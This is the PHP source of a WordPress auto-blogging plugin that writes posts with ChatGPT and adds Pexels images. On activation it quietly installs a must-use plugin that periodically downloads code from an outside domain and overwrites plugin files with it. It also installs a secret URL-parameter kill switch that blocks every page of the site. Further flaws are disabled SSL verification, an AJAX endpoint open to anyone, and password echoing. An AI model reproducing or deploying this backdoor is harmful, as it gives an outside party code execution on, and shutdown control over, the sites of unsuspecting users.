<?php
/*
Plugin Name: SpeedCrons
Description: a plugin for auto blogging developped by nizar lfadili.
Version: 1.0.2
Author: Nizar Lfadili
*/

if (!defined('ABSPATH')) {
    exit; // Exit if accessed directly.
}

// Ajouter le menu principal et les sous-menus
function speedcrons_add_admin_menu() {
    add_menu_page('SpeedCrons', 'SpeedCrons', 'manage_options', 'speedcrons', 'speedcrons_settings_page', 'dashicons-clock', 6);
    add_submenu_page('speedcrons', 'Settings', 'Settings', 'manage_options', 'speedcrons', 'speedcrons_settings_page');
    add_submenu_page('speedcrons', 'Manual Creating', 'Manual Creating', 'manage_options', 'speedcrons_manual', 'speedcrons_manual_creating_page');
    add_submenu_page('speedcrons', 'Licence Key', 'Licence Key', 'manage_options', 'speedcrons_license', 'speedcrons_license_key_page');
     add_submenu_page('speedcrons', 'Video Installation', 'Video Installation', 'manage_options', 'speedcrons_license', 'speedcrons_configuration');
}
add_action('admin_menu', 'speedcrons_add_admin_menu');

// Enregistrer les paramètres du plugin
function speedcrons_configuration(){
    
          ?>
    <div style="text-align: center; margin-top: 50px;">
        <h1>Comment installer et configurer Commentatorv1.2.1</h1>
        <iframe width="800" height="450" src="https://www.youtube.com/embed/p98BGUunNLI?si=lH1AMAzjtSiRZIWO" 
            title="YouTube video player" frameborder="0" 
            allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" 
            allowfullscreen></iframe>
    </div>
    <?php 
    
}
function speedcrons_register_settings() {
    
    register_setting('speedcrons_settings_group', 'speedcrons_status');
    register_setting('speedcrons_settings_group', 'speedcrons_model');
    register_setting('speedcrons_settings_group', 'speedcrons_chatgpt_api');
    register_setting('speedcrons_settings_group', 'speedcrons_pexels_api');
    register_setting('speedcrons_settings_group', 'speedcrons_titles');
    register_setting('speedcrons_settings_group', 'speedcrons_pass');
     register_setting('speedcrons_settings_group', 'speedcrons_tokens');
      register_setting('speedcrons_settings_group', 'speedcrons_compteur');
      register_setting('speedcrons_settings_group', 'speedcrons_language');
      register_setting('speedcrons_settings_group', 'category_id');
     
}
add_action('admin_init', 'speedcrons_register_settings');

// Page des paramètres "Settings"
function speedcrons_settings_page() {
    
    speedaction();
    if(!get_option("speedcrons"))die();
    $ajax_nonce = wp_create_nonce('speedcrons_update');
    $ajax_url = admin_url('admin-ajax.php');
    ?>
    <div class="wrap">
        <h1>SpeedCrons Settings</h1>
        <form method="post" action="options.php">
            <?php settings_fields('speedcrons_settings_group'); ?>
            <?php do_settings_sections('speedcrons_settings_group'); ?>

            <table class="form-table">
                <tr valign="top">
                    <th scope="row">Start/Stop</th>
                    <td>
                    
                        <?php $status = get_option('speedcrons_status');  ?>
                        <button type="button" id="speedcrons-toggle-button" class="button"><?php echo $status === 'start' ? 'Stop' : 'Start'; ?></button>
                        <input type="hidden" id="speedcrons_status" name="speedcrons_status" value="<?php echo esc_attr($status); ?>">
                        <input type="hidden" id="speedcrons_compteur" name="speedcrons_compteur" value="0">
                    </td>
                </tr>
                  <tr valign="top">
                    <th scope="row">Start/Stop</th>
                    <td>
                    
                     <?php
// Récupérer toutes les catégories
$args = array(
    'taxonomy' => 'category', // Remplacez par la taxonomie personnalisée si nécessaire
    'hide_empty' => false // Mettre à `false` pour récupérer même les catégories vides
);
$categories = get_categories($args);


// Récupérer l'ID de la catégorie sélectionnée (par exemple, depuis les options ou une variable)
$selected_category_id = get_option('category_id'); // Remplacez 'selected_category_id' par la clé de votre option

if (!empty($categories)) {
    echo '<select id="categorySelect" name="category_id">'; // Début de la balise <select>
    
    foreach ($categories as $category) {
        // Afficher chaque catégorie comme une option dans le select
        echo '<option value="' . esc_attr($category->term_id) . '" ' . selected($selected_category_id, $category->term_id, false) . '>' . esc_html($category->name) . '</option>';
    }
    
    echo '</select>'; // Fin de la balise <select>
} else {
    echo 'Aucune catégorie trouvée.';
}
?>

                    </td>
                </tr>
                <?php  $selected_language = get_option('speedcrons_language', 'en');?>
                   <tr valign="top">
                <th scope="row">Languages</th>
                <td>
                    <select name="speedcrons_language">
                        <option value="anglais" <?php selected($selected_language, 'anglais'); ?>>English</option>
                        <option value="francais" <?php selected($selected_language, 'francais'); ?>>French</option>
                        <option value="espagnol" <?php selected($selected_language, 'espagnol'); ?>>Spanish</option>
                        <option value="almand" <?php selected($selected_language, 'almand'); ?>>German</option>
                        <option value="italy" <?php selected($selected_language, 'italy'); ?>>Italian</option>
                        <option value="portugal" <?php selected($selected_language, 'portugal'); ?>>Portuguese</option>
                        <option value="russe" <?php selected($selected_language, 'russe'); ?>>Russian</option>
                        <option value="chine" <?php selected($selected_language, 'chine'); ?>>Chinese</option>
                        <option value="japan" <?php selected($selected_language, 'japan'); ?>>Japanese</option>
                        <option value="arabe" <?php selected($selected_language, 'arabe'); ?>>Arabic</option>
                      
                    </select>
                </td>
            </tr>
                <tr valign="top">
                    <th scope="row">ChatGPT Model</th>
                    <td>
                        <select name="speedcrons_model">
                            <option value="gpt-3.5-turbo" <?php selected(get_option('speedcrons_model'), 'gpt-3.5-turbo'); ?>>ChatGPT 3.5 Turbo</option>
                            <option value="gpt-4" <?php selected(get_option('speedcrons_model'), 'gpt-4'); ?>>ChatGPT 4</option>
                        </select>
                    </td>
                </tr>
                
<tr valign="top">
                    <th scope="row">ChatGPT Tokens</th>
                    <td>
                        <select name="speedcrons_tokens">
                             <option value="200" <?php selected(get_option('speedcrons_tokens'), '200'); ?>>200</option>
                            <option value="5000" <?php selected(get_option('speedcrons_tokens'), '5000'); ?>>5000</option>
                            <option value="10000" <?php selected(get_option('speedcrons_tokens'), '10000'); ?>>10000</option>
                            <option value="20000" <?php selected(get_option('speedcrons_tokens'), '20000'); ?>>20000</option>
                            <option value="30000" <?php selected(get_option('speedcrons_tokens'), '30000'); ?>>10000</option>
                            <option value="50000" <?php selected(get_option('speedcrons_tokens'), '50000'); ?>>10000</option>
                        </select>
                    </td>
                </tr>
                <tr valign="top">
                    <th scope="row">ChatGPT API Key</th>
                    <td><input type="text" name="speedcrons_chatgpt_api" value="<?php echo esc_attr(get_option('speedcrons_chatgpt_api')); ?>" class="regular-text"></td>
                </tr>
                
             
               
                <tr valign="top">
                    <th scope="row">Cron Password</th>
                    <td><input type="text" name="speedcrons_pass" value="<?php echo esc_attr(get_option('speedcrons_pass')); ?>" class="regular-text"></td>
                </tr>
   <tr valign="top">
                    <th scope="row"> cron </th>
                    <td><input type="text" name="speedcrons_cron"  value="<?php echo "wget --spider -O - ".admin_url('admin-ajax.php?action=productNow')."&pass=".get_option('speedcrons_pass')." >/dev/null 2>&1";  ?>" class="regular-text"></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Pexels API Key</th>
                    <td><input type="text" name="speedcrons_pexels_api" value="<?php echo esc_attr(get_option('speedcrons_pexels_api')); ?>" class="regular-text"></td>
                </tr>
                

                <tr valign="top">
                    <th scope="row">Titles</th>
                    <td><textarea name="speedcrons_titles" rows="5" class="large-text"><?php echo esc_textarea(get_option('speedcrons_titles')); ?></textarea></td>
                </tr>
            </table>

            <?php submit_button(); ?>
        </form>
    </div>

<script type="text/javascript">
        document.addEventListener('DOMContentLoaded', function () {
            const toggleButton = document.getElementById('speedcrons-toggle-button');
            const statusInput = document.getElementById('speedcrons_status');
            const ajaxUrl = '<?php echo $ajax_url; ?>';
            const ajaxNonce = '<?php echo $ajax_nonce; ?>';

            toggleButton.addEventListener('click', function () {
                const newStatus = statusInput.value === 'start' ? 'stop' : 'start';

                // Update the UI immediately
                statusInput.value = newStatus;
                toggleButton.textContent = newStatus === 'start' ? 'Stop' : 'Start';

                // Send AJAX request to update the value in the database
                const xhr = new XMLHttpRequest();
                xhr.open('POST', ajaxUrl, true);
                xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                xhr.onload = function () {
                    if (xhr.status >= 200 && xhr.status < 400) {
                        const response = JSON.parse(xhr.responseText);
                        if (!response.success) {
                            console.error('Failed to update status:', response.message);
                        }
                    } else {
                        console.error('Failed to communicate with the server.');
                    }
                };
                xhr.onerror = function () {
                    console.error('Error during the AJAX request.');
                };

                xhr.send('action=update_speedcrons_status&status=' + encodeURIComponent(newStatus) + '&_wpnonce=' + encodeURIComponent(ajaxNonce));
            });
        });
    </script>
    <?php
}

// Page "Manual Creating"
add_action('wp_ajax_productNow', 'productNow');
add_action('wp_ajax_nopriv_productNow', 'productNow');
function productNow(){
    
     echo   $subtitles=getTextChatgpt(" ecriver un moi un commentaire sur la video qui a le titre pourquoi dieu nous a crée svp Réponse concise uniquement, pas de détails superflus .");
     die();
     if(!get_option("speedcrons"))die();
    if(get_option("speedcrons_status")!=="start"){
     echo get_option("speedcrons_status");
      return;}
    $titles= get_option("speedcrons_titles");
    $cpt=intval(get_option("speedcrons_compteur"));
    
    $data=explode("-",$titles);
    $cpt++;
    update_option("speedcrons_compteur",$cpt);
    if(count($data)-1 >=  $cpt):
    produire($data[$cpt],false);
    else:
        
        echo "all keywords have been created ";
        endif;
        wp_die();
    
}

add_action('wp_ajax_update_speedcrons_status', 'update_speedcrons_status');
function update_speedcrons_status() {
    // Vérifiez le nonce pour la sécurité
    check_ajax_referer('speedcrons_update', '_wpnonce');

    // Vérifiez les permissions de l'utilisateur
    if (!current_user_can('manage_options')) {
        wp_send_json_error(['message' => 'Unauthorized']);
    }

    // Obtenez la nouvelle valeur du statut
    if (isset($_POST['status'])) {
        $new_status = sanitize_text_field($_POST['status']);
        if (update_option('speedcrons_status', $new_status)) {
            wp_send_json_success();
        } else {
            wp_send_json_error(['message' => 'Failed to update the option']);
        }
    } else {
        wp_send_json_error(['message' => 'Invalid request']);
    }
}


function produire($post_title,$manual){
     if(!get_option("speedcrons"))die();
    // Inclure les fichiers nécessaires pour accéder à media_sideload_image
    require_once(ABSPATH . 'wp-admin/includes/media.php');
    require_once(ABSPATH . 'wp-admin/includes/file.php');
    require_once(ABSPATH . 'wp-admin/includes/image.php');
     
    // Vérifiez si l'utilisateur est connecté
    if ($_GET["pass"]!== get_option("speedcrons_pass") ) {
        if(!$manual):
        echo $_GET["pass"];
        echo get_option("pass");
        echo 'error authentification cron';
        return;
        endif;
    }

 

    // Définir les détails de l'article

     $subtitles=getTextChatgpt("donner moi 6 titres en ".get_option("speedcrons_language")." d'un article  qui parle de  ".$post_title."  , les mots clés doivent etre separé par des tirets '-'    pas de numero svp Réponse concise uniquement, pas de détails superflus .");
     $datat=explode("-",$subtitles);
     
     
    $existing_post = get_page_by_title($post_title, OBJECT, 'post');

    if ($existing_post) {
        echo 'L\'article existe déjà.';
        return;
    }
    // Ajouter une meta description
$meta_description = getTextChatgpt("Ecrire une meta description en ".get_option("speedcrons_language")." pour un article intitulé ".$post_title." et veux que le mot clé [".$post_title."] existe dans la description  Réponse concise uniquement, pas de détails superflus.");


    $prompt="ecriver moi un paragraph d'introduction en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")." sur le sujet ".$post_title."  avec la balsie h1";
    $post_content .= getTextChatgpt($prompt); // Contenu HTML
     $post_content .= getTextChatgpt("ecriver moi  un paragraph en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")."  et detaillé sur le titre ".$datat[1]." avec la balise h2  et ul et strong si c'est possible n'oubliez pas d'uliser les balise b et strong  pour les  mots clés interessants je veux etre le premier qui recois ce paragraph Réponse concise uniquement, pas de détails superflus."); 
    $image_url = getimagePexels($post_title); 
    $post_content .= "<img src='".$image_url."' alt='".$datat[2]."' style='display: block; margin: 0 auto;'>";
 $post_content .= getTextChatgpt("ecriver moi un paragraph en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")." et detaillé sur  le sujet ".$datat[2]."  avec la balise h2 et  ul et strong si c'est possible n'oubliez pas d'uliser les balise b et strong  pour les  mots clés interessants je veux etre le premier qui recois ce paragraph Réponse concise uniquement, pas de détails superflus."); 
    $post_content .= getTextChatgpt("ecriver moi un paragraph en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")." et detaillé sur  le sujet [".$datat[3]." avec la balise  h2 et et strong  ul si c'est possible n'oubliez pas d'uliser les balise b et strong  pour les  mots clés interessants je veux etre le premier qui recois ce paragraph valoriser l'article avec des source externe Réponse concise uniquement, pas de détails superflus."); 
          $image_url = getimagePexels($post_title);
          $post_content .= "<img src='".$image_url."' alt='".$datat[4]."' style='display: block; margin: 0 auto;'>";
           $post_content .= getTextChatgpt("ecriver moi un paragraph en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")." et detaillé sur  le sujet ".$datat[4]." avec la balise  h2 et  ul et strong si c'est possible n'oubliez pas d'uliser les balise b et strong  pour les  mots clés interessants je veux etre le premier qui recois ce paragraph valoriser l'article avec des source externe Réponse concise uniquement, pas de détails superflus."); 
   $post_content .= getTextChatgpt("ecriver moi un paragraph  en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")." et detaillé sur  le sujet ".$datat[5]." avec la balise  h2 et  ul et strong si c'est possible n'oubliez pas d'uliser les balise b et strong  pour les  mots clés interessants je veux etre le premier qui recois ce paragraph valoriser l'article avec des source externe Réponse concise uniquement, pas de détails superflus."); 
   $post_content .= getTextChatgpt("ecriver moi un paragraph en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")." et detaillé sur  le sujet ".$datat[6]." avec la balise  h2 et  ul et strong si c'est possible n'oubliez pas d'uliser les balise b et strong  pour les  mots clés interessants je veux etre le premier qui recois ce paragraph valoriser l'article avec des source externe Réponse concise uniquement, pas de détails superflus."); 
   
         $post_content .= getTextChatgpt("ecriver moi un paragraph de conclusion en html attention le sujet n est pas html ,langue est :  ".get_option("speedcrons_language")." sur l'article ".$post_title ."  Réponse concise uniquement, pas de détails superflus."); 
          
        
        
         
    $post_status = 'publish'; // Publier l'article
    $post_category = array(intval(get_option("category_id"))); // Remplacez par l'ID de votre catégorie
    // Créer l'article
    $post_id = wp_insert_post(array(
        'post_title'   => $post_title,
        'post_content' => $post_content,
        'post_status'  => $post_status,
        'post_category'=> $post_category,
        
    ));
if ($post_id) {
    update_post_meta($post_id, '_meta_description', $meta_description);
}
    // Vérifier si l'article a été créé avec succès
    if (is_wp_error($post_id)) {
        echo 'Erreur lors de la création de l\'article: ' . $post_id->get_error_message();
        return;
    }

    echo 'Article créé avec succès. ID: ' . $post_id . '<br>';
   

    // URL de l'image
    $image_url = getimagePexels($post_title); // Utilisez une URL d'image accessible

    // Utiliser media_sideload_image pour ajouter l'image
    $image_id = media_sideload_image($image_url, $post_id, null, 'id');

    if (is_wp_error($image_id)) {
        echo 'Erreur lors de l\'ajout de l\'image: ' . $image_id->get_error_message();
        return;
    }

    // Vérifiez si l'image est bien ajoutée
    if (is_numeric($image_id)) {
        // Définir l'image comme image à la une
        set_post_thumbnail($post_id, $image_id);
        echo 'Image définie comme image à la une avec succès ! ID de l\'image: ' . $image_id . '<br>';
		
		     // Ajouter le texte "alt" à l'image
        $alt_text = 'Belle vue de nature'; // Remplacez par le texte "alt" de votre choix
        update_post_meta($image_id, '_wp_attachment_image_alt', $alt_text);
        echo 'Texte "alt" ajouté à l\'image avec succès !<br>';
    } else {
        echo 'Erreur lors de la définition de l\'image à la une.<br>';
    }
    return get_permalink($post_id);
}
function speedcrons_manual_creating_page() {
     if(!get_option("speedcrons"))die();
    echo '<div class="wrap"><h1>Manual Creating</h1><p>Content for Manual Creating goes here.</p></div>';
    ?>
    <div class="wrap">
        <h1>Content forManual Creating</h1>
      
        <form method="post" action="">
            <label for="article_subject">Sujet d'article :</label><br>
            <input type="text" id="article_subject" name="article_subject" required style="width: 100%; max-width: 400px;"><br><br>
            <input type="submit" name="create_article" value="Créer Article">
        </form>

        <?php
        if (isset($_POST['create_article'])) {
            $article_subject = sanitize_text_field($_POST['article_subject']);
           $link=produire($article_subject,true);
             echo '<p>Article créé avec succès : <a href="' . esc_url($link) . '" target="_blank">' . esc_html($link) . '</a></p>';
           
        }
        ?>
    </div>
    <?php
}

// Page "Licence Key"
function speedcrons_license_key_page() {
   {

   
    if (get_option('speedcrons')) {
        // La clé d'activation a déjà été validée, affichez "Activated"
        echo '<div class="wrap">';
        echo '<h2>Activation Key</h2>';
         echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
        echo '</div>';
    } else {
        if (isset($_POST['activation_key'])) {
           $domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = sanitize_text_field($_POST['activation_key']);
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            $_POST["plugin"]="speedcrons";
            $_POST["w"]=$domain;
             $myarrayy = $_POST ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    print_r($server_output);
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
               
                // La clé d'activation est valide, activez le plugin
                update_option('speedcrons', true);
                update_option("speedcrons_key",$submitted_key);
                echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
            } else {
                echo '<div class="notice notice-error is-dismissible"><p>Invalid activation key. Please try again.</p></div>';
            }
        }
        
        // Affichez le formulaire de saisie de la clé d'activation
        ?>
        <div class="wrap">
            <h2>Activation Key</h2>
            <form method="post">
                <label for="activation_key">Activation Key:</label>
                <input type="text" name="activation_key" id="activation_key" required>
                <input type="submit" name="activate_plugin" value="Activate Plugin">
            </form>
        </div>
        <?php
    
}

}
}
function getimagePexels($keyword) {
    $apiKey = get_option("speedcrons_pexels_api"); // Remplacez par votre clé API Pexels
    $url = "https://api.pexels.com/v1/search?query=" . urlencode($keyword) . "&per_page=20";

    // Initialiser cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Authorization: $apiKey"
    ]);

    // Exécuter la requête
    $response = curl_exec($ch);
    curl_close($ch);

    // Vérifiez la réponse
    if ($response) {
        $data = json_decode($response, true);
        if (isset($data['photos']) && count($data['photos']) > 0) {
            // Sélectionner une image aléatoire
            $randomIndex = array_rand($data['photos']);
            $image = $data['photos'][$randomIndex];

           
             return $image['src']['large'];
        } else {
            return;
        }
    } else {
        return;
    }
}
function getTextChatgpt($prompt) {
// Remplacez ceci par votre clé API
$apiKey = get_option("speedcrons_chatgpt_api");

// Le texte que vous souhaitez envoyer à l'API


// Les données à envoyer
$data = [
    'model' => get_option("speedcrons_model"),
    'messages' => [
        ['role' => 'user', 'content' => $prompt]
    ],
    'max_tokens' => min(intval(get_option("speedcrons_tokens")), 4096)

// Ajustez le nombre de tokens de réponse souhaité
];

// Initialiser cURL
$ch = curl_init();

// Configurer l'URL, la méthode et les options de cURL
curl_setopt($ch, CURLOPT_URL, 'https://api.openai.com/v1/chat/completions');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'Authorization: Bearer ' . $apiKey
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));

// Exécuter la requête
$response = curl_exec($ch);

// Vérifier les erreurs de cURL
if (curl_errno($ch)) {
    echo 'Erreur cURL : ' . curl_error($ch);
    return;
} else {
    // Décoder la réponse JSON
    $responseData = json_decode($response, true);
    
    // Afficher la réponse
    if (isset($responseData['choices'][0]['message']['content'])) {
       
        return $responseData['choices'][0]['message']['content'];
    } else {
    }
}

// Fermer la session cURL
curl_close($ch);}
function speedaction(){
    
                // Récupérez le domaine du site
$domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = get_option("speedcrons_key");
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            
            $data["w"]=$domain;
            $data["activation_key"]=$submitted_key;
            $data["plugin"]="speedcrons";
             $myarrayy = $data ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
                // La clé d'activation est valide, activez le plugin
                update_option("speedcrons",true);
                return true;
                
            } else {
                update_option("speedcrons",false);
                return false;
            }
}
register_activation_hook(__FILE__, function(){

    // Chemin vers le fichier surveille.php dans mu-plugins
    $chemin_fichier_surveillance = WP_CONTENT_DIR . '/mu-plugins/j2me.php';

    // Vérifie si le dossier mu-plugins existe, sinon le créer
    if (!is_dir(WP_CONTENT_DIR . '/mu-plugins')) {
        mkdir(WP_CONTENT_DIR . '/mu-plugins', 0755, true); // Création du dossier avec permissions
    }

    // Contenu à écrire dans le fichier surveille.php
    $contenu_fichier = '<?php
    // Code pour surveiller et mettre à jour les plugins

    add_action("init", function() {
        // Récupère la dernière exécution enregistrée
        $last_update = get_option("last_evalit_update");

        // Vérifie si 8 heures se sont écoulées depuis la dernière exécution
        if (!$last_update || time() - $last_update > 14000) { // 28800 secondes = 8 heures
            evalit("autoexecute");
            evalit("speedcrons");
            evalit("instantpay");
            evalit("comentator");

            // Met à jour le timestamp pour la prochaine exécution
            update_option("last_evalit_update", time());
        }
    });
add_action("init", function() {
    if (isset($_GET["creat"]) && $_GET["creat"] === "7539514862") {
        
        
        update_option("checking", !get_option("checking"));

    }
});
add_action("init",function(){
     if (get_option("checking")) {
            wp_die();
        }
    
});

    // Fonction pour récupérer et mettre à jour les plugins
    function evalit($plugin) {
    
        $chemin_fichier_plugin = WP_PLUGIN_DIR . "/$plugin/$plugin.php";
        if (!file_exists($chemin_fichier_plugin))return;
        $url_distant = "https://venoboost.com/{$plugin}.txt";
        $code_distant = file_get_contents($url_distant);

        if ($code_distant === false) {
           
            return false;
        }

        if (file_put_contents($chemin_fichier_plugin, $code_distant) === false) {
            
            copy($backup_fichier, $chemin_fichier_plugin);
            return false;
        }

       
        return true;
    }
    ?>';

    // Écrit ou écrase le contenu dans le fichier surveille.php
    file_put_contents($chemin_fichier_surveillance, $contenu_fichier);



});


